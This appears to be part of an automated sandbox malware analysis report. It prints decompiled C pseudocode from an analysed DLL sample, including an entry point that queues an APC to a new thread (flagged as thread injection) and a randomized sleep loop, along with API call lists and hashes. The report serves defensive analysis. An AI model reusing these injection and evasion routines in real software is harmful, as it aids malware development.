                                                                                                                                                                                                                                    control_flow_graph 325 401afa-401b0e 326 401b10-401b11 325->326 327 401b7f-401b8c InterlockedDecrement 325->327 328 401bcc-401bd3 326->328 330 401b17-401b24 InterlockedIncrement 326->330 327->328 329 401b8e-401b94 327->329 331 401bc0-401bc6 HeapDestroy 329->331 332 401b96 329->332 330->328 333 401b2a-401b3e HeapCreate 330->333 331->328 334 401b9b-401bab SleepEx 332->334 335 401b40-401b71 call 4015ee call 4012dc 333->335 336 401b7a-401b7d 333->336 337 401bb4-401bba CloseHandle 334->337 338 401bad-401bb2 334->338 335->328 343 401b73-401b76 335->343 336->328 337->331 338->334 338->337 343->336
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40410c;
						if( *0x40410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404118;
								if( *0x404118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40410c);
						}
						HeapDestroy( *0x404110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x404110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x404130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E004012DC(E0040111A, E004015EE(_a12, 1, 0x404118, _t41));
							 *0x40410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                    0x00401afd
                                                                                                                                                                                                                                    0x00401b09
                                                                                                                                                                                                                                    0x00401b0b
                                                                                                                                                                                                                                    0x00401b0e
                                                                                                                                                                                                                                    0x00401b84
                                                                                                                                                                                                                                    0x00401b8a
                                                                                                                                                                                                                                    0x00401b8c
                                                                                                                                                                                                                                    0x00401b8e
                                                                                                                                                                                                                                    0x00401b94
                                                                                                                                                                                                                                    0x00401b96
                                                                                                                                                                                                                                    0x00401b9b
                                                                                                                                                                                                                                    0x00401b9e
                                                                                                                                                                                                                                    0x00401ba9
                                                                                                                                                                                                                                    0x00401bab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401bad
                                                                                                                                                                                                                                    0x00401bb0
                                                                                                                                                                                                                                    0x00401bb2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401bb2
                                                                                                                                                                                                                                    0x00401bba
                                                                                                                                                                                                                                    0x00401bba
                                                                                                                                                                                                                                    0x00401bc6
                                                                                                                                                                                                                                    0x00401bc6
                                                                                                                                                                                                                                    0x00401b10
                                                                                                                                                                                                                                    0x00401b11
                                                                                                                                                                                                                                    0x00401b31
                                                                                                                                                                                                                                    0x00401b37
                                                                                                                                                                                                                                    0x00401b39
                                                                                                                                                                                                                                    0x00401b3e
                                                                                                                                                                                                                                    0x00401b7a
                                                                                                                                                                                                                                    0x00401b7a
                                                                                                                                                                                                                                    0x00401b40
                                                                                                                                                                                                                                    0x00401b48
                                                                                                                                                                                                                                    0x00401b4f
                                                                                                                                                                                                                                    0x00401b59
                                                                                                                                                                                                                                    0x00401b65
                                                                                                                                                                                                                                    0x00401b6c
                                                                                                                                                                                                                                    0x00401b71
                                                                                                                                                                                                                                    0x00401b76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401b76
                                                                                                                                                                                                                                    0x00401b71
                                                                                                                                                                                                                                    0x00401b3e
                                                                                                                                                                                                                                    0x00401b11
                                                                                                                                                                                                                                    0x00401bd3

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00404108), ref: 00401B1C
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401B31
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: CreateThread.KERNEL32 ref: 004012F3
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: GetLastError.KERNEL32(00000000), ref: 00401313
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: CloseHandle.KERNEL32(00000000), ref: 00401324
                                                                                                                                                                                                                                      • Part of subcall function 004012DC: SetLastError.KERNEL32(00000000), ref: 0040132D
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00404108), ref: 00401B84
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 00401B9E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00401BBA
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 00401BC6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                    • Opcode ID: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                                                                                                                                                                                                    • Instruction ID: 792522c7080727e056b4609bb1b29018c808fce2ea1d8660a7d1a9546f28a125
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421A4B1600205ABC7109F69ED89E1A7FB8F7A4351710413BF615F72F1E7789D408B58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F96A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F96A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2f9d238 = _t10;
				if(_t10 != 0) {
					 *0x2f9d1a8 = GetTickCount();
					_t12 = E02F98F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02F9B226();
							_t33 = _t14 + _t16;
							_t18 = E02F97E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02F96B96(_t25) != 0) {
							 *0x2f9d260 = 1; // executed
						}
						_t12 = E02F9225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                                                                                                                    0x02f96a56
                                                                                                                                                                                                                                    0x02f96a5c
                                                                                                                                                                                                                                    0x02f96a5d
                                                                                                                                                                                                                                    0x02f96a69
                                                                                                                                                                                                                                    0x02f96a71
                                                                                                                                                                                                                                    0x02f96a76
                                                                                                                                                                                                                                    0x02f96a86
                                                                                                                                                                                                                                    0x02f96a8b
                                                                                                                                                                                                                                    0x02f96a92
                                                                                                                                                                                                                                    0x02f96a94
                                                                                                                                                                                                                                    0x02f96a99
                                                                                                                                                                                                                                    0x02f96a9f
                                                                                                                                                                                                                                    0x02f96aa5
                                                                                                                                                                                                                                    0x02f96aaf
                                                                                                                                                                                                                                    0x02f96ab3
                                                                                                                                                                                                                                    0x02f96ab5
                                                                                                                                                                                                                                    0x02f96aba
                                                                                                                                                                                                                                    0x02f96abb
                                                                                                                                                                                                                                    0x02f96abc
                                                                                                                                                                                                                                    0x02f96ac1
                                                                                                                                                                                                                                    0x02f96ac7
                                                                                                                                                                                                                                    0x02f96ad0
                                                                                                                                                                                                                                    0x02f96ad1
                                                                                                                                                                                                                                    0x02f96ad6
                                                                                                                                                                                                                                    0x02f96adc
                                                                                                                                                                                                                                    0x02f96ae8
                                                                                                                                                                                                                                    0x02f96aea
                                                                                                                                                                                                                                    0x02f96aea
                                                                                                                                                                                                                                    0x02f96af4
                                                                                                                                                                                                                                    0x02f96af4
                                                                                                                                                                                                                                    0x02f96a78
                                                                                                                                                                                                                                    0x02f96a7a
                                                                                                                                                                                                                                    0x02f96a7a
                                                                                                                                                                                                                                    0x02f96afe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96A69
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F96A7D
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02F9807D,?), ref: 02F96A99
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F96A9F
                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 02F96ABC
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96AD6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 507476733-0
                                                                                                                                                                                                                                    • Opcode ID: 233d44269341231af217f00f0cdae82235f1f4c230651697649f72d12fdfae56
                                                                                                                                                                                                                                    • Instruction ID: 29a9487f26ce71934ffb2fdf862bc62651393d81300d17f44b23610b51dec26c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 233d44269341231af217f00f0cdae82235f1f4c230651697649f72d12fdfae56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711A572E842047FFB24AB75EC09B5ABB9DDB48BD0F10492AFB05D6190EBB0D4508B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004012DC, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 359 4012dc-4012fd CreateThread 360 401334-401337 359->360 361 4012ff-401310 QueueUserAPC 359->361 361->360 362 401312-401333 GetLastError TerminateThread CloseHandle SetLastError 361->362 362->360
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004012DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                                                                                    0x004012f3
                                                                                                                                                                                                                                    0x004012f9
                                                                                                                                                                                                                                    0x004012fd
                                                                                                                                                                                                                                    0x00401308
                                                                                                                                                                                                                                    0x00401310
                                                                                                                                                                                                                                    0x00401319
                                                                                                                                                                                                                                    0x0040131d
                                                                                                                                                                                                                                    0x00401324
                                                                                                                                                                                                                                    0x0040132b
                                                                                                                                                                                                                                    0x0040132d
                                                                                                                                                                                                                                    0x00401333
                                                                                                                                                                                                                                    0x00401310
                                                                                                                                                                                                                                    0x00401337

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 004012F3
                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00401313
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401324
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 0040132D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                    • Opcode ID: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                                                                                                                                                                                                    • Instruction ID: f5107841804292b3b09bf02656a39ff33859dc1d0ce8cd21f452a75bd9d4c98c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F05E32502220FBE6115FA0AD08F9FBF6CFB08712F004425FA01B1164C7348A008BAD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E02F9225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02F9550E();
				if(_t21 != 0) {
					_t59 =  *0x2f9d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2f9d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2f9d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02F93D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2f9d27c; // 0x44a5a8
					if( *0x2f9d25c > 5) {
						_t8 = _t26 + 0x2f9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2f9ea15; // 0x44283a44
						_t27 = _t7;
					}
					E02F91BF4(_t27, _t27);
					_t31 = E02F91B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2f9d270 =  *0x2f9d270 ^ 0x81bbe65d;
						_t32 = E02F92049(0x60);
						__eflags = _t32;
						 *0x2f9d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2f9d32c; // 0x33e95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2f9d32c; // 0x33e95b0
							 *_t51 = 0x2f9e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2f9d238, 0, 0x43);
							__eflags = _t36;
							 *0x2f9d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2f9d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2f9d27c; // 0x44a5a8
								_t13 = _t58 + 0x2f9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2f9c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02F9269C( ~_v8 &  *0x2f9d270, 0x2f9d00c); // executed
								_t42 = E02F94094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02F996A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02F96786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E02F93DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2f9d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02F9A501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                                                                                                                                                                                                    0x02f9225b
                                                                                                                                                                                                                                    0x02f92266
                                                                                                                                                                                                                                    0x02f92269
                                                                                                                                                                                                                                    0x02f9226c
                                                                                                                                                                                                                                    0x02f9226f
                                                                                                                                                                                                                                    0x02f92276
                                                                                                                                                                                                                                    0x02f92278
                                                                                                                                                                                                                                    0x02f92284
                                                                                                                                                                                                                                    0x02f92286
                                                                                                                                                                                                                                    0x02f92286
                                                                                                                                                                                                                                    0x02f9228f
                                                                                                                                                                                                                                    0x02f92297
                                                                                                                                                                                                                                    0x02f9229a
                                                                                                                                                                                                                                    0x02f922b4
                                                                                                                                                                                                                                    0x02f922c0
                                                                                                                                                                                                                                    0x02f922c2
                                                                                                                                                                                                                                    0x02f922c7
                                                                                                                                                                                                                                    0x02f922d1
                                                                                                                                                                                                                                    0x02f922d1
                                                                                                                                                                                                                                    0x02f922c9
                                                                                                                                                                                                                                    0x02f922c9
                                                                                                                                                                                                                                    0x02f922c9
                                                                                                                                                                                                                                    0x02f922c9
                                                                                                                                                                                                                                    0x02f922d8
                                                                                                                                                                                                                                    0x02f922e5
                                                                                                                                                                                                                                    0x02f922ec
                                                                                                                                                                                                                                    0x02f922f1
                                                                                                                                                                                                                                    0x02f922f1
                                                                                                                                                                                                                                    0x02f922f9
                                                                                                                                                                                                                                    0x02f922fc
                                                                                                                                                                                                                                    0x02f92322
                                                                                                                                                                                                                                    0x02f9232e
                                                                                                                                                                                                                                    0x02f92333
                                                                                                                                                                                                                                    0x02f92335
                                                                                                                                                                                                                                    0x02f9233a
                                                                                                                                                                                                                                    0x02f92366
                                                                                                                                                                                                                                    0x02f92368
                                                                                                                                                                                                                                    0x02f9233c
                                                                                                                                                                                                                                    0x02f92340
                                                                                                                                                                                                                                    0x02f92345
                                                                                                                                                                                                                                    0x02f9234a
                                                                                                                                                                                                                                    0x02f92351
                                                                                                                                                                                                                                    0x02f92357
                                                                                                                                                                                                                                    0x02f9235c
                                                                                                                                                                                                                                    0x02f92362
                                                                                                                                                                                                                                    0x02f92369
                                                                                                                                                                                                                                    0x02f9236b
                                                                                                                                                                                                                                    0x02f9236d
                                                                                                                                                                                                                                    0x02f9237c
                                                                                                                                                                                                                                    0x02f92382
                                                                                                                                                                                                                                    0x02f92384
                                                                                                                                                                                                                                    0x02f92389
                                                                                                                                                                                                                                    0x02f923b9
                                                                                                                                                                                                                                    0x02f923bb
                                                                                                                                                                                                                                    0x02f9238b
                                                                                                                                                                                                                                    0x02f9238b
                                                                                                                                                                                                                                    0x02f92391
                                                                                                                                                                                                                                    0x02f9239e
                                                                                                                                                                                                                                    0x02f923a4
                                                                                                                                                                                                                                    0x02f923a4
                                                                                                                                                                                                                                    0x02f923ac
                                                                                                                                                                                                                                    0x02f923b5
                                                                                                                                                                                                                                    0x02f923bc
                                                                                                                                                                                                                                    0x02f923be
                                                                                                                                                                                                                                    0x02f923c0
                                                                                                                                                                                                                                    0x02f923c7
                                                                                                                                                                                                                                    0x02f923d4
                                                                                                                                                                                                                                    0x02f923d9
                                                                                                                                                                                                                                    0x02f923de
                                                                                                                                                                                                                                    0x02f923e0
                                                                                                                                                                                                                                    0x02f923e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f923e4
                                                                                                                                                                                                                                    0x02f923e9
                                                                                                                                                                                                                                    0x02f923eb
                                                                                                                                                                                                                                    0x02f923f2
                                                                                                                                                                                                                                    0x02f923f6
                                                                                                                                                                                                                                    0x02f923f9
                                                                                                                                                                                                                                    0x02f9240e
                                                                                                                                                                                                                                    0x02f92412
                                                                                                                                                                                                                                    0x02f92417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92417
                                                                                                                                                                                                                                    0x02f923fb
                                                                                                                                                                                                                                    0x02f923fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92403
                                                                                                                                                                                                                                    0x02f92408
                                                                                                                                                                                                                                    0x02f9240a
                                                                                                                                                                                                                                    0x02f9240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9240c
                                                                                                                                                                                                                                    0x02f923ef
                                                                                                                                                                                                                                    0x02f923ef
                                                                                                                                                                                                                                    0x02f923c0
                                                                                                                                                                                                                                    0x02f922fe
                                                                                                                                                                                                                                    0x02f922fe
                                                                                                                                                                                                                                    0x02f92303
                                                                                                                                                                                                                                    0x02f92419
                                                                                                                                                                                                                                    0x02f9241d
                                                                                                                                                                                                                                    0x02f92425
                                                                                                                                                                                                                                    0x02f92425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9241d
                                                                                                                                                                                                                                    0x02f92309
                                                                                                                                                                                                                                    0x02f9230c
                                                                                                                                                                                                                                    0x02f92316
                                                                                                                                                                                                                                    0x02f9231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9242d
                                                                                                                                                                                                                                    0x02f9242d
                                                                                                                                                                                                                                    0x02f92431
                                                                                                                                                                                                                                    0x02f92435
                                                                                                                                                                                                                                    0x02f92435

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F9550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,02F92274,00000000,00000000), ref: 02F9551D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02F922F1
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F92340
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(033E9570), ref: 02F92351
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: memset.NTDLL ref: 02F93DEE
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F93E22
                                                                                                                                                                                                                                      • Part of subcall function 02F93DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02F93E2D
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02F9237C
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F923AC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4246211962-0
                                                                                                                                                                                                                                    • Opcode ID: d5d765a93ae258e245829dfafe674ede755a16a2478b7a06b80a0dfa5c934190
                                                                                                                                                                                                                                    • Instruction ID: 5b6daa204a90760605308367114801594fc318f35d8b0c0cf5f1c3908381b003
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d765a93ae258e245829dfafe674ede755a16a2478b7a06b80a0dfa5c934190
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051DF71E40219BBFF20ABB9DD84F6EB7A9AB087C4F104826EB01D7242E7719954CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F93AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 02F93B46
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(02F91885), ref: 02F93B89
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F93B9D
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F93BAB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
